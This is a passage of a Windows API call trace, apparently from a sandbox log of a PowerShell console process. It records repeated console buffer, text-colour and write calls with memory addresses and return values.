GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.350] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.351] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.351] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.352] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.352] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.352] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b62c730, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0351.354] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.354] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.355] GetConsoleOutputCP () returned 0x1b5 [0351.355] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.355] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.358] CoTaskMemFree (pv=0x1a8ad510) [0351.358] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280c33c*, nNumberOfCharsToWrite=0x6b, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280c33c*, lpNumberOfCharsWritten=0x1b62da58*=0x6b) returned 1 [0351.359] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.360] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.360] GetConsoleOutputCP () returned 0x1b5 [0351.360] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.361] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.362] CoTaskMemFree (pv=0x1a8ad510) [0351.362] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.363] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.363] GetConsoleOutputCP () returned 0x1b5 [0351.364] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.364] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.368] CoTaskMemFree (pv=0x1a8ad510) [0351.368] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.369] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.369] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.370] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.370] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.371] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.371] GetConsoleOutputCP () returned 0x1b5 [0351.371] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.371] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.372] CoTaskMemFree (pv=0x1a8ad510) [0351.372] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.374] GetConsoleOutputCP () returned 0x1b5 [0351.374] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.374] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.375] CoTaskMemFree (pv=0x1a8ad510) [0351.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.375] GetConsoleOutputCP () returned 0x1b5 [0351.376] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.376] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.376] CoTaskMemFree (pv=0x1a8ad510) [0351.376] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.377] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.377] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.378] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.379] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.379] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.384] GetConsoleOutputCP () returned 0x1b5 [0351.384] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.384] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.385] CoTaskMemFree (pv=0x1a8ad510) [0351.385] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280c57c*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280c57c*, lpNumberOfCharsWritten=0x1b62da58*=0x14) returned 1 [0351.385] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.386] GetConsoleOutputCP () returned 0x1b5 [0351.387] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.387] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.387] CoTaskMemFree (pv=0x1a8ad510) [0351.387] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.388] GetConsoleOutputCP () returned 0x1b5 [0351.388] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.388] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.389] CoTaskMemFree (pv=0x1a8ad510) [0351.389] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.389] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.390] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.390] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.391] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.391] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.391] GetConsoleOutputCP () returned 0x1b5 [0351.392] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.392] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.393] CoTaskMemFree (pv=0x1a8ad510) [0351.393] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.393] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.394] GetConsoleOutputCP () returned 0x1b5 [0351.394] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.394] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.395] CoTaskMemFree (pv=0x1a8ad510) [0351.395] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.396] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.397] GetConsoleOutputCP () returned 0x1b5 [0351.397] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.397] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.398] CoTaskMemFree (pv=0x1a8ad510) [0351.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.399] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.399] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.400] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.400] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.401] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.401] GetConsoleOutputCP () returned 0x1b5 [0351.401] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.402] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.402] CoTaskMemFree (pv=0x1a8ad510) [0351.402] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280b4bc*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280b4bc*, lpNumberOfCharsWritten=0x1b62da58*=0x10) returned 1 [0351.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.404] GetConsoleOutputCP () returned 0x1b5 [0351.404] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.404] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.405] CoTaskMemFree (pv=0x1a8ad510) [0351.405] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.405] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.406] GetConsoleOutputCP () returned 0x1b5 [0351.406] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.406] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.407] CoTaskMemFree (pv=0x1a8ad510) [0351.407] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.407] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.408] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.408] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.408] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.409] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.409] GetConsoleOutputCP () returned 0x1b5 [0351.410] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.410] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.410] CoTaskMemFree (pv=0x1a8ad510) [0351.410] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.412] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.412] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.413] GetConsoleOutputCP () returned 0x1b5 [0351.413] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.413] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.414] CoTaskMemFree (pv=0x1a8ad510) [0351.414] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.414] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.414] GetConsoleOutputCP () returned 0x1b5 [0351.415] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.415] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.416] CoTaskMemFree (pv=0x1a8ad510) [0351.416] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.416] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.416] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.417] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.417] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.418] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.418] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.418] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.419] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.419] GetConsoleOutputCP () returned 0x1b5 [0351.420] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.420] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.420] CoTaskMemFree (pv=0x1a8ad510) [0351.420] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x280b4fc*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x280b4fc*, lpNumberOfCharsWritten=0x1b62da58*=0x4b) returned 1 [0351.421] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.421] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.422] GetConsoleOutputCP () returned 0x1b5 [0351.422] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.422] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.423] CoTaskMemFree (pv=0x1a8ad510) [0351.423] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.423] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.424] GetConsoleOutputCP () returned 0x1b5 [0351.424] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.424] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.425] CoTaskMemFree (pv=0x1a8ad510) [0351.425] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.425] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.425] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.426] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.426] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.427] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.428] GetConsoleOutputCP () returned 0x1b5 [0351.428] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.428] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.429] CoTaskMemFree (pv=0x1a8ad510) [0351.429] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.429] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.430] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.430] GetConsoleOutputCP () returned 0x1b5 [0351.431] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.431] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.431] CoTaskMemFree (pv=0x1a8ad510) [0351.431] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.432] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.432] GetConsoleOutputCP () returned 0x1b5 [0351.433] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.433] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.433] CoTaskMemFree (pv=0x1a8ad510) [0351.433] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.434] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.434] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.435] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.435] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.435] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.436] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.436] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.437] 